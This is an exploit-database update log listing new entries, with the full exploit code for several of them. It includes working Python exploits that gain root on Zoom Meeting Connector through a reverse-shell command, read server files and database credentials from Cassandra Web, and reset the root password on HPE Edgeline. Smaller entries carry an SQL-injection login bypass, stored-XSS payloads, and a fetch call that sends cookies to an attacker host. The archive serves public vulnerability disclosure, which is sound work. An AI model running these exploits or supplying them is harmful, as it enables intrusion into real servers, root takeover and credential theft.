DB: 2021-01-06

19 changes to exploits/shellcodes

Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path
Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission
IncomCMS 2.0 - Insecure File Upload
House Rental and Property Listing 1.0 - Multiple Stored XSS
Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS
Online Movie Streaming  1.0 - Authentication Bypass
Responsive ELearning System 1.0 - 'id' Sql Injection
Baby Care System 1.0 - 'Post title' Stored XSS
Responsive FileManager 9.13.4 - 'path' Path Traversal
Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated)
HPE Edgeline Infrastructure Manager 1.0 - Multiple Remote Vulnerabilities
Cassandra Web 0.5.0 - Remote File Read
CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
Online Learning Management System 1.0 - RCE (Authenticated)
Klog Server 2.4.1 - Command Injection (Unauthenticated)
EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting

exploits/linux/webapps/49360.py

@@ -0,0 +1,237 @@
+# Exploit Title: Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated)
+# Date: 12-29-2020
+# Exploit Author: Jeremy Brown
+# Vendor Homepage: https://support.zoom.us/hc/en-us/articles/201363093-Deploying-the-Meeting-Connector
+# Software Link: https://support.zoom.us/hc/en-us/articles/201363093-Deploying-the-Meeting-Connector
+# Version: 4.6.239.20200613
+
+#!/usr/bin/python
+# -*- coding: UTF-8 -*-
+#
+# zoomer.py
+#
+# Zoom Meeting Connector Post-auth Remote Root Exploit
+#
+# Jeremy Brown [jbrown3264/gmail]
+# Dec 2020
+#
+# The Meeting Connector Web Console listens on port 5480. On the dashboard
+# under Network -> Proxy, one can enable a proxy server. All of the fields
+# are sanitized to a certain degree, even the developers noting in the proxy()
+# function within backend\webconsole\WebConsole\net.py that they explicitly
+# were concerned with command injection and attempted to prevent it:
+#
+# if ('"' in proxy_name) or ('"' in proxy_passwd):  # " double quotes cannot be used to prevent shell injection
+#     is_valid = False
+#
+# It makes sense to leave some flexibility in the character limits here
+# passwords are often expected to contain more than alphanumeric characters.
+# But of course that means the Proxy Password field is still vulnerable to
+# command injection with the ` character.
+#
+# The proxy data gets concatenated and written to /etc/profile.d/proxy.sh.
+# Every three minutes, a task runs which executes this proxy script as root.
+# After submission the dashboard says “The proxy will take effect after the
+# server reboot!”, but the commands will still be executed within actually
+# requiring a reboot. Keep in mind that the commands will be executed blind.
+#
+# For example, `id>/tmp/proxy_test` given as the Proxy Password will produce
+# this in the /tmp/proxy_test file:
+#
+# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
+#
+# MMR was tested, but Controller and VRC may also be vulnerable
+#
+# Usage
+# > zoomer.py 10.0.0.10 admin xsecRET1 "sh -i >& /dev/udp/10.0.0.11/5555 0>&1"
+# login succeeded
+# command sent to server
+#
+# $ nc -u -lvp 5555
+# ....
+# sh: no job control in this shell
+# sh-4.2# pwd
+# /root
+# sh-4.2#
+#
+# setenforce 0 if SELinux bothers you, service sshd start and add users/keys,
+# check tokens in /opt/zoom/conf/register, check out the local environment, etc.
+#
+# Dependencies
+# - pip install pyquery
+#
+# Fix
+# Zoom says they've fixed this in the latest version
+#
+
+import os
+import sys
+import argparse
+import requests
+import urllib.parse
+from pyquery import PyQuery
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+class Zoomer(object):
+	def __init__(self, args):
+		self.target = args.target
+		self.port = args.port
+		self.username = args.username
+		self.password = args.password
+		self.command = args.command
+
+	def run(self):
+		target = "https://" + self.target + ':' + str(self.port)
+
+		session = requests.Session()
+		session.verify = False
+
+		#
+		# get csrftoken from /login and use it to auth with creds
+		#
+		try:
+			resp = session.get(target + "/login")
+		except Exception as error:
+			print("Error: %s" % error)
+			return -1
+
+		try:
+			csrftoken = resp.headers['set-cookie'].split(';')[0]
+		except:
+			print("Error: couldn't parse csrftoken from response header")
+			return -1
+
+		csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
+
+		if(csrfmiddlewaretoken == None):
+			return -1
+
+		data = \
+			{'csrfmiddlewaretoken':csrfmiddlewaretoken,
+			'name':self.username,
+			'password':self.password}
+
+		headers = \
+			{'Host':self.target + ':' + str(self.port),
+			'Referer':target,
+			'Cookie':csrftoken}
+
+		try:
+			resp = session.post(target + "/login", headers=headers, data=data)
+		except Exception as error:
+			print("Error: %s" % error)
+			return -1
+
+		if(resp.status_code != 200 or 'Wrong' in resp.text):
+			print("login failed")
+			return -1
+		else:
+			print("login succeeded")
+
+		#
+		# get csrfmiddlewaretoken from /network/proxy and post cmd
+		#
+		try:
+			resp = session.get(target + "/network/proxy")
+		except Exception as error:
+			print("Error: %s" % error)
+			return -1
+
+		csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')
+
+		cookies = session.cookies.get_dict()
+
+		#
+		# this happens with view-only users
+		#
+		if(len(cookies) < 2):
+			print("Error: failed to get session ID")
+			return -1
+
+		command = '`' + self.command + '`'
+
+		headers = \
+			{'Host':self.target + ':' + str(self.port),
+			'Referer':target,
+			'Cookie': \
+				'csrftoken=' + cookies['csrftoken'] + ';' + \
+				'sessionid=' + cookies['sessionid']}
+
+		data = \
+			{'csrfmiddlewaretoken':csrfmiddlewaretoken,
+			'proxyValue':1,
+			'proxyAddr':'localhost',
+			'proxyPort':8080,
+			'proxyName':'test',
+			'proxyPasswd':command}
+
+		try:
+			resp = session.post(target + "/network/proxy", headers=headers, data=data)
+		except Exception as error:
+			print("Error: %s" % error)
+			return -1
+
+		if(resp.status_code != 200):
+			print("something failed")
+			return -1
+		else:
+			print("command sent to server")
+
+		return 0
+
+	def get_token(self, body, name):
+		token = None
+
+		pq = PyQuery(body)
+
+		if(name == 'csrftoken'):
+			print("csrftoken")
+
+		if(name == 'csrfmiddlewaretoken'):
+			token = pq('input').attr('value')
+
+		return token
+
+def arg_parse():
+	parser = argparse.ArgumentParser()
+
+	parser.add_argument("target",
+						type=str,
+						help="Zoom server")
+
+	parser.add_argument("-p",
+						"--port",
+						type=int,
+						default=5480,
+						help="Zoom port")
+
+	parser.add_argument("username",
+						type=str,
+						help="Valid username")
+
+	parser.add_argument("password",
+						type=str,
+						help="Valid password")
+
+	parser.add_argument("command",
+						type=str,
+						help="Command to execute (replace space with $IFS ?)")
+
+	args = parser.parse_args()
+
+	return args
+
+def main():
+	args = arg_parse()
+
+	zm = Zoomer(args)
+
+	result = zm.run()
+
+	if(result > 0):
+		sys.exit(-1)
+
+if(__name__ == '__main__'):
+	main()

exploits/linux/webapps/49362.py

@@ -0,0 +1,141 @@
+# Exploit Title: Cassandra Web 0.5.0 - Remote File Read
+# Date: 12-28-2020
+# Exploit Author: Jeremy Brown
+# Vendor Homepage: https://github.com/avalanche123/cassandra-web
+# Software Link: https://rubygems.org/gems/cassandra-web/versions/0.5.0
+# Version: 0.5.0
+# Tested on: Linux
+
+#!/usr/bin/python
+# -*- coding: UTF-8 -*-
+#
+# cassmoney.py
+#
+# Cassandra Web 0.5.0 Remote File Read Exploit
+#
+# Jeremy Brown [jbrown3264/gmail]
+# Dec 2020
+#
+# Cassandra Web is vulnerable to directory traversal due to the disabled
+# Rack::Protection module. Apache Cassandra credentials are passed via the
+# CLI in order for the server to auth to it and provide the web access, so
+# they are also one thing that can be captured via the arbitrary file read.
+#
+# Usage
+# > cassmoney.py 10.0.0.5 /etc/passwd
+# root:x:0:0:root:/root:/bin/bash
+# daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+# bin:x:2:2:bin:/bin:/usr/sbin/nologin
+# ...
+#
+# > cassmoney.py 10.0.0.5 /proc/self/cmdline
+# /usr/bin/ruby2.7/usr/local/bin/cassandra-web--usernameadmin--passwordP@ssw0rd
+#
+# (these creds are for auth to the running apache cassandra database server)
+#
+# Fix
+# - fixed in github repo
+# - v0.6.0 / ruby-gems when available
+# (still recommended to containerize / run this in some sandbox, apparmor, etc)
+#
+
+import os
+import sys
+import argparse
+import requests
+import urllib.parse
+
+SIGNATURE = 'cassandra.js'
+
+#
+# /var/lib/gems/2.7.0/gems/cassandra-web-0.5.0/app/public
+#
+DT = '../'
+DT_NUM = 8
+
+class CassMoney(object):
+	def __init__(self, args):
+		self.target = args.target
+		self.file = args.file
+		self.port = args.port
+		self.force = args.force
+		self.number = args.number
+
+	def run(self):
+		target = "http://" + self.target + ':' + str(self.port)
+
+		payload = urllib.parse.quote_plus(DT * self.number + self.file)
+
+		try:
+			deskpop = requests.get(target)
+		except Exception as error:
+			print("Error: %s" % error)
+			return -1
+
+		if(SIGNATURE not in deskpop.text and self.force == False):
+			print("Target doesn't look like Cassandra Web, aborting...")
+			return -1
+
+		try:
+			req = requests.get(target + '/' + payload)
+		except:
+			print("Failed to read %s (perm denied likely)" % self.file)
+			return -1
+
+		if(SIGNATURE in req.text):
+			print("Failed to read %s (bad path?)" % self.file)
+			return -1
+
+		if(len(req.text) == 0):
+			print("Server returned nothing for some reason")
+			return 0
+
+		print("\n%s" % req.text)
+
+		return 0
+
+def arg_parse():
+	parser = argparse.ArgumentParser()
+
+	parser.add_argument("target",
+						type=str,
+						help="Cassandra Web Host")
+
+	parser.add_argument("file",
+						type=str,
+						help="eg. /etc/passwd, /proc/sched_debug + /proc/<cass-web-pid>/cmdline")
+
+	parser.add_argument("-p",
+						"--port",
+						type=int,
+						default=3000,
+						help="Cassandra Web Port")
+
+	parser.add_argument("-f",
+						"--force",
+						default=False,
+						action='store_true',
+						help="Run the payload even if server isn't Cassandra Web")
+
+	parser.add_argument("-n",
+						"--number",
+						type=int,
+						default=DT_NUM,
+						help="Adjust the number of dot-dot-slash")
+
+	args = parser.parse_args()
+
+	return args
+
+def main():
+	args = arg_parse()
+
+	cm = CassMoney(args)
+
+	result = cm.run()
+
+	if(result > 0):
+		sys.exit(-1)
+
+if(__name__ == '__main__'):
+	main()

exploits/multiple/webapps/49351.html

@@ -0,0 +1,22 @@
+# Exploit Title:  IncomCMS 2.0 - Insecure File Upload
+# Google Dork: intext:"Incom CMS 2.0"
+# Date: 07.12.2020
+# Exploit Author: MoeAlBarbari
+# Vendor Homepage:  https://www.incomcms.com/
+# Version: 2.0
+# Tested on: BackBox linux
+# CVE: CVE-2020-29597
+
+<!DOCTYPE html>
+<html>
+<head>
+  <title>Upload your files</title>
+</head>
+<body>
+  <form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
+    <p>Upload your file</p>
+    <input type="file" name="Filedata"></input><br />
+    <input type="submit" value="Upload"></input>
+  </form>
+</body>
+</html>

exploits/multiple/webapps/49361.py

@@ -0,0 +1,218 @@
+# Exploit Title: HPE Edgeline Infrastructure Manager 1.0 - Multiple Remote Vulnerabilities
+# Date: 12-28-2020
+# Exploit Author: Jeremy Brown
+# Vendor Homepage: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_f62aaafe780a496dad6d28621a
+# Software Link: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_f62aaafe780a496dad6d28621a
+# Version: 1.0
+
+#!/usr/bin/python
+# -*- coding: UTF-8 -*-
+#
+# billhader.py
+#
+# HPE Edgeline Infrastructure Manager Multiple Remote Vulnerabilities
+#
+# Jeremy Brown [jbrown3264/gmail]
+# Dec 2020
+#
+# In \opt\hpe\eim\containers\api\eim\api\urls.py, some private paths are defined
+# which are intended to only be accessible via the local console.
+#
+#    path('private/AdminPassReset', views.admin_password_reset), <-- ice
+#    path('private/ResetAppliance', views.reset_appliance), <-- ice
+#    path('private/EIMApplianceIP', views.get_eim_appliance_ips), <-- boring
+#
+# These are meant to only be exposed for the local GUI so admins can perform
+# functions without authenticating. The way do they do this is by checking the
+# Host header and returning a 404 not found for not-localhost, but 200 OK for
+# 127.0.0.1. This is of course flawed because any remote user has control over
+# the Host header and they can call these functions with valid JSON, eg.
+# /private/AdminPassReset to reset the admin password and login via SSH (default)
+# as root due to the Administrator and root always synced to the same password.
+# They can also call ResetAppliance and the appliance will immediately reset
+# user data and cause the entire server to reboot.
+#
+# Administrator is the default and permanent web console user and as mentioned it's
+# tied to the root OS user account. When Administrator changes their password, the
+# backend changes the root password to the same. Other users can be added to the
+# web console, but there is nothing stopping them changing any other user’s password.
+# Not even sure if this is a bug or just wow functionality because although the
+# users appear different, they all seem to share the same role. Broken or incomplete
+# design I guess. So any user can change the Administrator password and use it to
+# login as root via the default open SSH server, start setting up camp, etc.
+#
+# Usage examples
+# > billhader.py 10.0.0.10 pre_root_passwd -n letmein
+# {"RootPasswd": "Modified", "UserPassword": "Modified"}
+#
+# > ssh root@10.0.0.10
+# root@10.10.10.20's password: [letmein]
+# [root@hpe-eim ~]#
+#
+# > billhader.py 10.0.0.10 post_root_passwd -u test -p abc123
+# login succeeded
+# {"Status": "success", "Valid_Entries": ["Password"], "Invalid_Entries": []}
+#
+# (root password is now newpassword default of 'letmein')
+#
+# > billhader.py 10.10.10.20 pre_factory_reset
+# Lost your password huh? Are you sure you want to factory reset this server?
+# yes
+# done
+#
+
+import os
+import sys
+import argparse
+import requests
+import urllib.parse
+import json
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+BINGO = '127.0.0.1' # not localhost :')
+DEFAULT_PORT = 443
+
+class BillHader(object):
+	def __init__(self, args):
+		self.target = args.target
+		self.action = args.action
+		self.newpassword = args.newpassword
+		self.username = args.username
+		self.password = args.password
+
+	def run(self):
+		target = "https://" + self.target + ':' + str(DEFAULT_PORT)
+
+		session = requests.Session()
+		session.verify = False
+
+		if(self.action == 'pre_root_passwd'):
+			headers = {'Host':BINGO}
+
+			data = \
+			{'Password':self.newpassword,
+			'ConfirmPassword':self.newpassword}
+
+			try:
+				resp = session.post(target + "/private/AdminPassReset",
+					headers=headers,
+					data=json.dumps(data))
+			except Exception as error:
+				print("Error: %s" % error)
+				return -1
+
+			print("%s" % resp.text)
+
+		if(self.action == 'post_root_passwd'):
+			data = \
+			{'UserName':self.username,
+			'Password':self.password}
+
+			try:
+				resp = session.post(target + "/redfish/v1/SessionService/Sessions",
+					data=json.dumps(data))
+			except Exception as error:
+				print("Error: %s" % error)
+				return -1
+
+			if(resp.status_code != 201):
+				print("login failed")
+				return -1
+			else:
+				print("login succeeded")
+
+			try:
+				token = resp.headers['x-auth-token']
+			except:
+				print("Error: couldn't parse token from response header")
+				return -1
+
+			if(token == None):
+				print("Error: couldn't parse token from session")
+				return -1
+
+			headers = {'X-Auth-Token':token}
+
+			data = {'Password':self.newpassword}
+
+			try:
+				resp = session.patch(target + "/redfish/v1/AccountService/Accounts/1",
+					headers=headers,
+					data=json.dumps(data))
+			except Exception as error:
+				print("Error: %s" % error)
+				return -1
+
+			print("%s" % resp.text)
+
+		if(self.action == 'pre_factory_reset'):
+			print("Lost your password huh? Are you sure you want to factory reset this server?")
+
+			choice = input().lower()
+
+			if('yes' not in choice):
+				print("cool, exiting")
+				return -1
+
+			headers = {'Host':BINGO}
+
+			data = {'ResetRequired':'true'}
+
+			try:
+				resp = session.post(target + "/private/ResetAppliance", \
+					headers=headers,
+					data=json.dumps(data))
+			except Exception as error:
+				print("Error: %s" % error)
+				return -1
+
+			print("done")
+
+		return 0
+
+def arg_parse():
+	parser = argparse.ArgumentParser()
+
+	parser.add_argument("target",
+						type=str,
+						help="EIM host")
+
+	parser.add_argument("action",
+						type=str,
+						choices=['pre_root_passwd', 'post_root_passwd', 'pre_factory_reset'],
+						help="Which action to perform on the server")
+
+	parser.add_argument("-n",
+						"--newpassword",
+						type=str,
+						default="letmein",
+						help="New password to set for root account (letmein)")
+
+	parser.add_argument("-u",
+						"--username",
+						type=str,
+						help="Valid username (for post_root_reset)")
+
+	parser.add_argument("-p",
+						"--password",
+						type=str,
+						help="Valid password (for post_root_reset)")
+
+	args = parser.parse_args()
+
+	return args
+
+def main():
+	args = arg_parse()
+
+	bill = BillHader(args)
+
+	result = bill.run()
+
+	if(result > 0):
+		sys.exit(-1)
+
+if(__name__ == '__main__'):
+	main()

exploits/multiple/webapps/49367.txt

@@ -0,0 +1,37 @@
+# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
+# Date: 30-12-2020
+# Exploit Author: Mesut Cetin
+# Vendor Homepage: http://egavilanmedia.com
+# Version: 1.0
+# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34
+
+Vulnerable parameter: email, gender, username
+Payload: <script>alert(document.cookie)</script>
+
+Proof of Concept:
+
+To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps:
+
+1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
+2. Click above right on the "Profile" tab
+3. Navigate to the "Edit Profile" tab
+4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page.
+5. Capture the POST request in Burp Suite and manipulate the parameter as shown:
+
+POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1
+Host: demo.egavilanmedia.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 180
+Origin: http://demo.egavilanmedia.com
+Connection: close
+Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php
+Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e
+
+fullname=admin&username=<script>alert(document.cookie)</script>&email=<script>alert('PoC 2')</script>&gender==<script>alert('PoC 3')</script>&action=update_admin
+
+6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like <BODY ONLOAD=fetch(`http://attackers-page.com/${document.cookie}`)>, the session cookies can be send to the attacker.

exploits/php/webapps/48826.txt

@@ -1,12 +1,11 @@
 # Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
-# Google Dork: -
 # Date: 2020-09-19
 # Exploit Author: Alperen Ergel
 # Vendor Homepage: https://www.flatpress.org/
 # Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
 # Version: 1.0.3 
 # Tested on: windows 10 / xampp 
-# CVE : -
+# CVE : CVE-2020-35241
 
 
 # Proof Of Content

exploits/php/webapps/49352.txt

@@ -0,0 +1,17 @@
+# Exploit Title: House Rental and Property Listing 1.0 - Multiple Stored XSS
+# Tested on: Windows 10
+# Exploit Author: Mohamed habib Smidi (Craniums)
+# Date: 2020-12-28
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14649/house-rental-and-property-listing-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14649&title=House+Rental+and+Property+Listing+in+PHP+with+Full+Source+Code
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+
+Step 1: Create a new user then login
+Step 2: Click on "Register" page to register a room.
+Step 3: input "<script>alert("Full name")</script>" in all fields each one with the field name except phone number, alternate number.
+Note: for the email address you can inspect elements and change the type from email to text.
+Step 4: Once all fields are completed, Click on Submit
+Step 5: From the home page click on Details/Update, This will trigger all Stored XSS payloads one after the other.

exploits/php/webapps/49353.txt

@@ -0,0 +1,11 @@
+# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
+# Date: 2020-12-27
+# Exploit Author: Kshitiz Raj (manitorpotterk)
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+Step 1 -  Go to url http://localhost/Resumes/login.html
+Step 2 - Enter Username :-   ' or '1'='1'#
+Step 3 -  Enter Password -   anything

exploits/php/webapps/49354.txt

@@ -0,0 +1,48 @@
+# Exploit Title: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
+# Date: 04-01-2021
+# Software Link: https://wordpress.org/plugins/stripe-payments/#developers
+# Exploit Author: Park Won Seok
+# Contact: kkigg39@gmail.com
+# Category: Webapps
+# Version: stripe-payments (Ver_2.0.39)
+# Tested on: Windows 10 x64
+
+# description:
+# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins stripe-payments (Ver_2.0.39)
+# Vulnerability parameters : "AcceptStripePayments-settings[currency_code]" have Cross-Site Scripting.
+
+# POC -  Stored Cross-Site Scripting
+
+POST /wp-admin/options.php HTTP/1.1
+Host:  localhost
+Content-Length: 5786
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http:// localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer:
+http://192.168.31.131/wp-admin/edit.php?post_type=asp-products&page=stripe-payments-settings
+Accept-Encoding: gzip, deflate
+Accept-Language: ko,en-US;q=0.9,en;q=0.8
+Cookie:
+wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7C50b0c8ba4dcc6dfdd756418c9fc960d3736f93a0febf165408110ea815dbab03;
+wordpress_test_cookie=WP%20Cookie%20check;
+wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7Cb3e517e751d2519dc5473f911230fe31c966c9c755f193344b4bdea80a09d8b4;
+asp_transient_id=36985e31f4be2b5ae0e14586c592c87d;
+wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist;
+wp-settings-time-1=1608903490
+Connection: close
+
+wp-asp-urlHash=general&option_page=AcceptStripePayments-settings-group&action=update&_wpnonce=eee296fed3&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dasp-products%26page%3Dstripe-payments-settings&AcceptStripePayments-settings%5Bcheckout_url%5D=http%3A%2F%2F192.168.31.131%2Fstripe-checkout-result%2F&asp_products_page_url_value=http%3A%2F%2F192.168.31.131%2Fproducts%2F&
+*AcceptStripePayments-settings%5Bcurrency_code%5D=USDjk9v0%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3edr45t*
+&AcceptStripePayments-settings%5Bcurrency_symbol%5D=%24&AcceptStripePayments-settings%5Bbutton_text%5D=Buy+Now&AcceptStripePayments-settings%5Bpopup_button_text%5D=Pay+%25s&AcceptStripePayments-settings%5Bcheckout_lang%5D=&AcceptStripePayments-settings%5Bpopup_default_country%5D=0&AcceptStripePayments-settings%5Bapi_publishable_key%5D=1&AcceptStripePayments-settings%5Bapi_secret_key%5D=2&AcceptStripePayments-settings%5Bapi_publishable_key_test%5D=3&AcceptStripePayments-settings%5Bapi_secret_key_test%5D=4&AcceptStripePayments-settings%5Bbuyer_email_type%5D=text&AcceptStripePayments-settings%5Bfrom_email_address%5D=test+%3Csales%
+40your-domain.com
+%3E&AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+the+purchase&AcceptStripePayments-settings%5Bbuyer_email_body%5D=Hello%0D%0A%0D%0AThank+you+for+your+purchase%21+You+ordered+the+following+item%28s%29%3A%0D%0A%0D%0A%7Bproduct_details%7D&AcceptStripePayments-settings%5Bseller_notification_email%5D=localhost%
+40google.com <http://40naver.com/>
+&AcceptStripePayments-settings%5Bseller_email_type%5D=text&AcceptStripePayments-settings%5Bseller_email_subject%5D=Notification+of+product+sale&AcceptStripePayments-settings%5Bseller_email_body%5D=Dear+Seller%0D%0A%0D%0AThis+mail+is+to+notify+you+of+a+product+sale.%0D%0A%0D%0A%7Bproduct_details%7D%0D%0A%0D%0AThe+sale+was+made+to+%7Bpayer_email%7D%0D%0A%0D%0AThanks&AcceptStripePayments-settings%5Bsend_email_on_error_to%5D=localhost%
+40google.com <http://40naver.com/>
+&AcceptStripePayments-settings%5Bprice_currency_pos%5D=left&AcceptStripePayments-settings%5Bprice_decimal_sep%5D=.&AcceptStripePayments-settings%5Bprice_thousand_sep%5D=%2C&AcceptStripePayments-settings%5Bprice_decimals_num%5D=2&AcceptStripePayments-settings%5Bcustom_field_name%5D=&AcceptStripePayments-settings%5Bcustom_field_descr%5D=&AcceptStripePayments-settings%5Bcustom_field_descr_location%5D=placeholder&AcceptStripePayments-settings%5Bcustom_field_position%5D=above&AcceptStripePayments-settings%5Bcustom_field_type%5D=text&AcceptStripePayments-settings%5Bcustom_field_validation%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_regex%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_err_msg%5D=Please+enter+valid+data&AcceptStripePayments-settings%5Btos_text%5D=I+accept+the+%3Ca+href%3D%22https%3A%2F%2Fexample.com%2Fterms-and-conditions%2F%22+target%3D%22_blank%22%3ETerms+and+Conditions%3C%2Fa%3E&AcceptStripePayments-settings%5Btos_position%5D=above&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUSD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEUR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BGBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BAUD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BARS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBAM%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBGN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBRL%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCAD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCLP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCNY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCOP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCZK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BDKK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEGP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHKD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHUF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BINR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BIDR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BILS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BJPY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BLBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMYR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMXN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNZD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNOK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPEN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPHP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPLN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRON%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRUB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSGD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BZAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BKRW%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSEK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCHF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTWD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTHB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTRY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUYU%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BVND%5D=1&AcceptStripePayments-settings%5Bpp_additional_css%5D=&AcceptStripePayments-settings%5Brecaptcha_site_key%5D=&AcceptStripePayments-settings%5Brecaptcha_secret_key%5D=&submit=Save+Changes

exploits/php/webapps/49355.txt

@@ -0,0 +1,42 @@
+# Exploit Title: WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS
+# Date: 04-01-2021
+# Software Link: https://wordpress.org/plugins/wp-paginate/
+# Exploit Author: Park Won Seok
+# Contact: kkigg39@gmail.com
+# Category: Webapps
+# Version: WP-Paginate(Ver-2.1.3)
+# CVE : N/A
+# Tested on: Windows 10 x64
+
+# description:
+# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins WP-Paginate(Ver_2.1.3)
+# Vulnerability parameters : 2nd parameter "preset" have Stored-XSS.
+
